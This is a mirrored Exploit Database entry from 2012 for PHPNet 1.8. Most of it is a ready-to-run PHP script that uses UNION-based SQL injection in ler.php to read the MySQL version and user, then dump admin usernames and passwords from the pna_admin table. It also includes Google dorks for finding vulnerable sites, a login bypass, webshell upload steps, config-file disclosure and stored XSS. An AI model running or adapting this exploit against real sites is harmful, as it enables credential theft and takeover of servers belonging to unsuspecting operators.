PHPNet 1.8 – ‘ler.php’ SQL Injection

Exploit Database
107 阅读

作者： WhiteCollarGroup

日期： 2012-06-07
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/19007/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

<?php

# Exploit Title: PHPNet <= 1.8 (ler.php) SQL Injection

# Exploit Author: WhiteCollarGroup

# Date: 06th 06 2012

# Vendor homepage: http://www.phpnet.com.br/

# Software Link: http://phpbrasil.com/script/Wb03ErMczAho/phpnetartigos

# Google Dork: intext:"Powerd by Nielson Rocha"

# Google Dork: inurl:"ler.php?id=" intext:"Voltar - Imprimir"

# Version: 1.8

# Tested on: Debian GNU/Linux,Windows 7 Ultimate

We discovered multiple vulnerabilities on the system.

~> SQL Injection

This exploit is for a vulnerability in ler.php, but are the same vulnerability on imprimir.php and imagem.php.

ler.php?id=[SQLi]

imprimir.php?id=[SQLi]

imagem.php?id=[SQLi]

Usage:

php file.php http://server/path/

~> Login bypass

In login page, you can bypass the login using "SQLi strings".

Go to http://server/path/admin/login.php

Pass: wcgroup

~> Arbitraty File Upload

After open administration panel, try to add a new article.

Use the upload form to upload your webshell.

After posting, access:

http://server/path/tmp/your_shell_filename.php

~> Information disclosure

Access:

http://server/path/conf/config.ini

~> XSS Stored (persistent)

When posting a new article, you can post (D)HTML/Javascript codes on the page.

function _printf($str) {

echo $str."\n";

}

function hex($string){

$hex=''; // PHP 'Dim' =]

for ($i=0; $i < strlen($string); $i++){

$hex .= dechex(ord($string[$i]));

}

return '0x'.$hex;

}

set_time_limit(0);

error_reporting(E_ERROR & E_USER_WARNING);

@ini_set('default_socket_timeout', 30);

echo "\n";

echo "PHPNet <= 1.8 SQLi Exploit\n";

echo "Discovered by WhiteCollarGroup\n";

echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com";

if($argc!=2) {

_printf("Usage:");

_printf("php $argv[0] <target>");

_printf("Example:");

_printf("php $argv[0] http://site.com/path/");

exit;

}

$target = $argv[1];

if(substr($target, (strlen($target)-1))!="/") { // se o ultimo caractere nao for uma barra

$target .= "/";

}

$inject = $target . "ler.php?id=-0'%20";

$token = uniqid();

$token_hex = hex($token);

// vamos agora obter os seguintes dados: user() version()

echo "\n\n[*] Trying to get informations...\n";

$infos = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",version(),".$token_hex.",user(),".$token_hex."),6,7,8-- "));

$infos_r = array();

preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r);

$user = $infos_r[1][0];

$version = $infos_r[2][0];

if(($user) AND ($version))

{

echo "[!] MySQL user: $user\n";

echo "[!] MySQL version: $version\n";

}

else

{

echo "[-] Error while getting informations...\n";

}

$i = 0;

while(1==1) {

$dados_r = array();

$dados = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",admin_user,".$token_hex.",admin_pass,".$token_hex."),6,7,8 from pna_admin limit $i,1-- "));

preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r);

$login = $dados_r[1][0];

$senha = $dados_r[2][0];

if(($login) AND ($senha)) {

echo "-+-\n";

echo "[!] User: $login\n";

echo "[!] Pass: $senha\n";

$i++;

} else {

break; // exitloop

}

if($i==0) {

echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry.";

} else {

echo "-+-\n[!] :D";

}

echo "\n";

}